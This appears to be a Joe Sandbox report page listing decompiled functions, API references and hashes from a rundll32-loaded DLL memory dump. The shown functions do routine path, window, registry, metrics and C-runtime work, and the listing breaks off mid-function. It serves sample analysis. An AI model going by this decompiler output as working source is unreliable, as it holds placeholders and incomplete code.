Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$LongParentVisible
String ID:
API String ID: 506644340-0
Opcode ID: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
Instruction ID: 9ff0abfdc9ec089c08616602c8c252ca1eec58daf7253e76d9435a222983167d
Opcode Fuzzy Hash: e05f7d3be3f5bc05d13bf1b8876ce0f3ed84c428b3ff9c55c238cc21a07b9566
Instruction Fuzzy Hash: 2B21C1366087286FE732EEA19C49F2B769CEF406D0F02491CF845E7596C760EC01D791

Uniqueness

Uniqueness Score: -1.00%

Function 10024AA1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E10024AA1(void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				CHAR* _t21;
				CHAR* _t22;
				int _t31;
				CHAR* _t33;
				intOrPtr _t35;
				CHAR* _t40;
				void* _t44;
				void* _t47;

				_t40 = _a4;
				_t31 = lstrlenA(_t40);
				_t21 = E10038481(_t40, 0, 0) - 1;
				_t44 = _t31 - _t21;
				_t35 = _t44 + _t40;
				_a4 = _t21;
				_v8 = _t35;
				if(_a8 < _t31) {
					if(_a8 >= _t21) {
						_t33 =  &(_t40[2]);
						if( *_t40 == 0x5c && _t40[1] == 0x5c) {
							while( *_t33 != 0x5c) {
								_t33 = E100127D1(_t33);
							}
						}
						if(_t44 > 3) {
							do {
								_t33 = E100127D1(_t33);
							} while ( *_t33 != 0x5c);
						}
						_t22 = _a4;
						_t47 = _t33 - _t40;
						_t12 =  &(_t22[5]); // 0x5
						if(_a8 >= _t47 + _t12) {
							while(lstrlenA(_t33) + _t47 + 4 > _a8) {
								do {
									_t33 = E100127D1(_t33);
								} while ( *_t33 != 0x5c);
							}
							 *((char*)(_t47 + _t40)) = 0;
							lstrcatA(_t40, "\\...");
							_t21 = lstrcatA(_t40, _t33);
						} else {
							_push(_v8);
							goto L14;
						}
					} else {
						if(_a12 == 0) {
							_t35 = 0x1003da51;
						}
						_push(_t35);
						L14:
						_t21 = lstrcpyA(_t40, ??);
					}
				}
				return _t21;
			}

APIs

lstrlenA.KERNEL32(?), ref: 10024AAC

Part of subcall function 10038481: PathFindFileNameA.SHLWAPI(?,10024ABE,?,00000000,00000000), ref: 10038485
Part of subcall function 10038481: lstrlenA.KERNEL32(00000000), ref: 10038493

lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
lstrlenA.KERNEL32(?,?,00000000,00000000), ref: 10024B44
lstrcatA.KERNEL32(?,\...), ref: 10024B63
lstrcatA.KERNEL32(?,00000000), ref: 10024B67

Strings

\..., xrefs: 10024B53

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: lstrlen$lstrcat$FileFindNamePathlstrcpy
String ID: \...
API String ID: 1604900594-1167917071
Opcode ID: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
Instruction ID: ad9d98bbfb168da91c5fc0e9dd0c54a6fb05e1c2565fcdf0eb8a60c119eae97e
Opcode Fuzzy Hash: c6931ab51682fc242367e88b01f8127b1a7b5b36c9db75e19ca6de4f4063a79a
Instruction Fuzzy Hash: 7D21E57590075AAEEB22CB70ACC4F5B7BF8DB05296F52805EE9059B042EB74E940CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100304C6 Relevance: 10.6, APIs: 7, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E100304C6(void* __ecx) {
				struct tagMSG _v28;
				void* __ebp;
				int _t21;
				intOrPtr _t24;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				int _t40;

				_push(0);
				_t39 = __ecx;
				_t40 = 0xf;
				while(PeekMessageA( &_v28, 0, _t40, _t40, ??) != 0) {
					_t21 = GetMessageA( &_v28, 0, _t40, _t40);
					if(_t21 != 0) {
						DispatchMessageA( &_v28);
						_push(0);
						continue;
					}
					return _t21;
				}
				_t24 =  *((intOrPtr*)(_t39 + 0x68));
				 *((intOrPtr*)(_t39 + 0x70)) =  *((intOrPtr*)(_t24 + 0x80));
				 *(_t39 + 0x78) =  *(_t24 + 0x7c) & 0x0000f000;
				SetRectEmpty(_t39 + 0xc);
				 *((intOrPtr*)(_t39 + 0x20)) = 0;
				 *((intOrPtr*)(_t39 + 0x1c)) = 0;
				 *((intOrPtr*)(_t39 + 0x24)) = 0;
				 *((intOrPtr*)(_t39 + 0x7c)) = 0;
				 *((intOrPtr*)(_t39 + 0x80)) = 0;
				_t38 = E100220EE(_t40, GetDesktopWindow());
				if(LockWindowUpdate( *(_t38 + 0x1c)) == 0) {
					_push(3);
				} else {
					_push(0x403);
				}
				_push(GetDCEx( *(_t38 + 0x1c), 0, ??));
				_t33 = E10029068();
				 *((intOrPtr*)(_t39 + 0x84)) = _t33;
				return _t33;
			}

APIs

GetMessageA.USER32 ref: 100304E5
DispatchMessageA.USER32 ref: 100304F8
PeekMessageA.USER32 ref: 10030507
SetRectEmpty.USER32(?), ref: 10030528
GetDesktopWindow.USER32 ref: 10030540
LockWindowUpdate.USER32(?,00000000), ref: 10030551
GetDCEx.USER32(?,00000000,00000003), ref: 10030568

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
String ID:
API String ID: 1192691108-0
Opcode ID: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
Instruction ID: 8a91eee366d4ec1ad94f649a4fc85a3a9efab89b356857822c8a99d212f9e85e
Opcode Fuzzy Hash: 06b4c299dc567982cef96a8cbd163e36840bc634fd2061b6762b667766671556
Instruction Fuzzy Hash: 39215EB2500B09AFE311DF66DC84E57BBECFB04251F41492EF655CA511D735E9448F60

Uniqueness

Uniqueness Score: -1.00%

Function 100358C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100358C8(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x50), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x64), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x100358e3
0x100358ea
0x100358ed
0x100358f0
0x100358f3
0x100358fe
0x10035935
0x10035935
0x10035940
0x10035945
0x10035945
0x1003594a
0x1003594f
0x1003594f
0x10035958

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 100358F6
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10035919
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 10035935
RegCloseKey.ADVAPI32(?), ref: 10035945
RegCloseKey.ADVAPI32(?), ref: 1003594F

Strings

software, xrefs: 100358DE

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
Instruction ID: f89c3a735d8d1ef68568a63ef4ea0061cb5f0d4f5e3c764e69df4fb83dc90cc3
Opcode Fuzzy Hash: b6fa45f7376c14bbd91f7de534b8f54106cc882384df34a105742167e70254b3
Instruction Fuzzy Hash: BF11B37690029DFFDB12DB9ACD88DDFBFBCEF89755F1040AAE500A6121D2719A00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10007B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10007B50(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;

				if(E1000799F() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							lstrcpynA(_t23 + 0x28, "DISPLAY", 0x20);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x1004ee08(_a4, _a8);
			}

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 10007B8E
GetSystemMetrics.USER32 ref: 10007BA6
GetSystemMetrics.USER32 ref: 10007BAD
lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 10007BD3

Strings

DISPLAY, xrefs: 10007BCA
B, xrefs: 10007B6D

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: System$Metrics$InfoParameterslstrcpyn
String ID: B$DISPLAY
API String ID: 2307409384-3316187204
Opcode ID: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
Instruction ID: f9e3eb19a9beaf27ca7ac5b5242ad86db65a0bc6b8874f4885458b15db7551ae
Opcode Fuzzy Hash: 8573ca3a594fcf350d1bc17a37b23e0e63b952d590c658fbeaf9c3e867428680
Instruction Fuzzy Hash: B6117771A012399FEB12DF658C84B5B7BA8FF05791B118466FD09AE109D374DD40CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 10020D81 Relevance: 10.6, APIs: 7, Instructions: 60COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 10020D8D
GetWindowRect.USER32 ref: 10020DA8
ScreenToClient.USER32 ref: 10020DBB
ScreenToClient.USER32 ref: 10020DC4
EqualRect.USER32 ref: 10020DCE
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 10020DF6
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 10020E00

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ClientRectScreen$DeferEqualParent
String ID:
API String ID: 443303494-0
Opcode ID: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
Instruction ID: 0a58a577598c21a1846f40493314dc2d021d714bbb101a3e6ae2e9ccd4581a15
Opcode Fuzzy Hash: 817c61356f7b4056e44297cbe386f6cab579009338145abfb40613178538e0f1
Instruction Fuzzy Hash: C1113D7650021AAFDB01DFA5DC84EBBBBBEEF84310B118419F916E7112D770A940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10030B92 Relevance: 9.3, APIs: 6, Instructions: 326COMMON

Download Yara Rule

APIs

Part of subcall function 100304C6: PeekMessageA.USER32 ref: 10030507
Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568

Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4

GetWindowRect.USER32 ref: 10030BDC

Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD

GetWindowRect.USER32 ref: 10030CA6
InflateRect.USER32(?,00000002,00000002), ref: 10030D5E

Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372

Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725

Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E

GetWindowRect.USER32 ref: 10030D79
InflateRect.USER32(?,00000002,00000002), ref: 10030E61
InflateRect.USER32(?,00000002,00000002), ref: 10030E74

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
String ID:
API String ID: 2136250054-0
Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90

Uniqueness

Uniqueness Score: -1.00%

Function 100134E7 Relevance: 9.2, APIs: 6, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t62;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr _t71;
				void* _t72;
				intOrPtr _t74;
				char _t75;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t90;
				intOrPtr* _t92;
				intOrPtr _t94;
				intOrPtr _t101;
				intOrPtr _t102;
				char _t105;
				signed int _t111;
				intOrPtr _t113;
				intOrPtr _t118;
				intOrPtr* _t121;
				void* _t127;
				intOrPtr _t128;
				intOrPtr* _t129;
				intOrPtr _t132;
				void* _t134;
				intOrPtr _t136;
				intOrPtr _t138;

				_t118 = __edx;
				_t121 = _a4;
				_t101 =  *((intOrPtr*)(_t121 + 4));
				_t62 =  *_t121;
				_t132 = _t101;
				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
					L29:
					_t63 = 0;
					__eflags = 0;
					goto L30;
				} else {
					_t134 = _t101 - 0x1000;
					if(_t134 > 0) {
						goto L29;
					}
					if(_t134 < 0) {
						L6:
						_push(_t127);
						E100193FB(_t127, _t135);
						_t102 =  *((intOrPtr*)(_t121 + 4));
						_t136 = _t102;
						_t128 =  *_t121;
						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
							_t65 = E10018BEF(_t121);
							__eflags =  *0x1004cdec; // 0x1
							_t129 = _t65;
							if(__eflags == 0) {
								L15:
								asm("cdq");
								_t67 =  *0x1004cde8; // 0x7080
								_t123 = _t118;
								asm("cdq");
								_t105 =  *_t129 - _t67;
								__eflags = _t105;
								asm("sbb edi, edx");
								_v12 = _t105;
								_v8 = _t118;
								L16:
								_t68 = E10019490(_t105, _t123, 0x3c, 0);
								__eflags = _t68;
								 *_t129 = _t68;
								if(_t68 < 0) {
									 *_t129 = _t68 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t69 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
								_v8 = _t118;
								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
								__eflags = _t71;
								 *((intOrPtr*)(_t129 + 4)) = _t71;
								if(_t71 < 0) {
									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
									_v12 = _v12 + 0xffffffc4;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t72 = E10013780(_v12, _v8, 0x3c, 0);
								asm("cdq");
								asm("adc edi, edx");
								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
								_v8 = _t118;
								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
								__eflags = _t74;
								 *((intOrPtr*)(_t129 + 8)) = _t74;
								if(_t74 < 0) {
									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
									_v12 = _v12 + 0xffffffe8;
									asm("adc dword [ebp-0x4], 0xffffffff");
								}
								_t75 = E10013780(_v12, _v8, 0x18, 0);
								__eflags = _t118;
								_v12 = _t75;
								_v8 = _t118;
								if(__eflags > 0) {
									goto L28;
								} else {
									if(__eflags < 0) {
										L25:
										asm("cdq");
										_t111 = 7;
										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
										_t79 =  *((intOrPtr*)(_t129 + 0xc));
										__eflags = _t79;
										if(_t79 > 0) {
											_t60 = _t129 + 0x1c;
											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
											__eflags =  *_t60;
										} else {
											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
										}
										goto L28;
									}
									__eflags = _t75;
									if(_t75 >= 0) {
										goto L28;
									}
									goto L25;
								}
							}
							_push(_t129);
							_t85 = E10019447(0, _t121, _t129, __eflags);
							__eflags = _t85;
							if(_t85 == 0) {
								goto L15;
							}
							_t113 =  *0x1004cdf0; // 0xfffff1f0
							_t86 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("cdq");
							asm("sbb edx, edi");
							_v12 =  *_t129 - _t86 + _t113;
							_v8 = _t118;
							 *((intOrPtr*)(_t129 + 0x20)) = 1;
							_t123 = _v8;
							_t105 = _v12;
							goto L16;
						} else {
							_t90 =  *0x1004cde8; // 0x7080
							asm("cdq");
							asm("sbb ecx, edx");
							_v12 = _t128 - _t90;
							_v8 = _t102;
							_t92 = E10018BEF( &_v12);
							_t138 =  *0x1004cdec; // 0x1
							_t129 = _t92;
							if(_t138 != 0) {
								_push(_t129);
								if(E10019447(0, _t121, _t129, _t138) != 0) {
									_t94 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v12 = _v12 - _t94;
									asm("sbb [ebp-0x4], edx");
									_t129 = E10018BEF( &_v12);
									 *((intOrPtr*)(_t129 + 0x20)) = 1;
								}
							}
							L28:
							_t63 = _t129;
							L30:
							return _t63;
						}
					}
					_t135 = _t62;
					if(_t62 > 0) {
						goto L29;
					}
					goto L6;
				}
			}

APIs

Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61

__allrem.LIBCMT ref: 100135FA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
__allrem.LIBCMT ref: 10013637
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
__allrem.LIBCMT ref: 10013676
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699

Part of subcall function 10019447: __lock.LIBCMT ref: 10019455

Memory Dump Source

Source File: 00000003.00000002.259153358.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.259148779.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259186666.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259228140.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259239658.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.259292912.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
String ID:
API String ID: 1282128132-0
Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40

Uniqueness

Uniqueness Score: -1.00%

Function 1001843D Relevance: 9.1, APIs: 6, Instructions: 145
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t42;
				void* _t43;
				short* _t45;
				int _t58;
				int _t62;
				long _t65;
				int _t67;
				void* _t69;
				short* _t77;
				short* _t78;
				int _t79;
				short* _t83;
				short* _t84;
				void* _t85;
				short* _t86;
				void* _t91;

				_t69 = __ecx;
				_push(0x1c);
				_push(0x10042730);
				E10012514(__ebx, __edi, __esi);
				_t83 = 0;
				_t91 =  *0x1004f740 - _t83; // 0x1
				if(_t91 == 0) {
					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
						_t65 = GetLastError();
						__eflags = _t65 - 0x78;
						if(_t65 == 0x78) {
							 *0x1004f740 = 2;
						}
					} else {
						 *0x1004f740 = 1;
					}
				}
				_t42 =  *0x1004f740; // 0x1
				if(_t42 == 2 || _t42 == _t83) {
					_t67 =  *(_t85 + 0x1c);
					__eflags = _t67 - _t83;
					if(_t67 == _t83) {
						_t67 =  *0x1004f724; // 0x0
					}
					_t77 =  *(_t85 + 0x18);
					__eflags = _t77;
					if(_t77 == 0) {
						_t77 =  *0x1004f734; // 0x0
					}
					_t43 = E1001A444(_t67, _t67);
					__eflags = _t43 - 0xffffffff;
					if(_t43 != 0xffffffff) {
						__eflags = _t43 - _t77;
						if(__eflags == 0) {
							L29:
							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
							__eflags = _t83;
							if(__eflags != 0) {
								_push(_t83);
								E100107C8(_t67, _t78, _t83, __eflags);
							}
							_t45 = _t78;
							goto L32;
						}
						_push(0);
						_push(0);
						_push(_t85 + 0x10);
						_push( *(_t85 + 0xc));
						_push(_t43);
						_push(_t77);
						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
						__eflags = _t83;
						if(_t83 == 0) {
							goto L25;
						}
						 *(_t85 + 0xc) = _t83;
						goto L29;
					} else {
						goto L25;
					}
				} else {
					if(_t42 != 1) {
						L25:
						_t45 = 0;
						L32:
						return E1001254F(_t45);
					}
					 *(_t85 - 0x24) = _t83;
					 *(_t85 - 0x20) = _t83;
					if( *(_t85 + 0x18) == _t83) {
						_t62 =  *0x1004f734; // 0x0
						 *(_t85 + 0x18) = _t62;
					}
					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
					 *(_t85 - 0x28) = _t79;
					if(_t79 == 0) {
						goto L25;
					} else {
						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
						_t68 = _t79 + _t79;
						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
						 *(_t85 - 0x18) = _t86;
						_t84 = _t86;
						 *(_t85 - 0x2c) = _t84;
						E10011C50(_t84, 0, _t79 + _t79);
						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
						_t99 = _t84;
						if(_t84 != 0) {
							L15:
							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
							if(_t58 != 0) {
								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
							}
							_t102 =  *(_t85 - 0x20);
							if( *(_t85 - 0x20) != 0) {
								_push(_t84);
								E100107C8(_t68, _t79, _t84, _t102);
							}
							_t45 =  *(_t85 - 0x24);
							goto L32;
						} else {
							_push(_t79);
							_push(2);
							_t84 = E1001382A(_t68, _t79, _t84, _t99);
							if(_t84 == 0) {
								goto L25;
							}
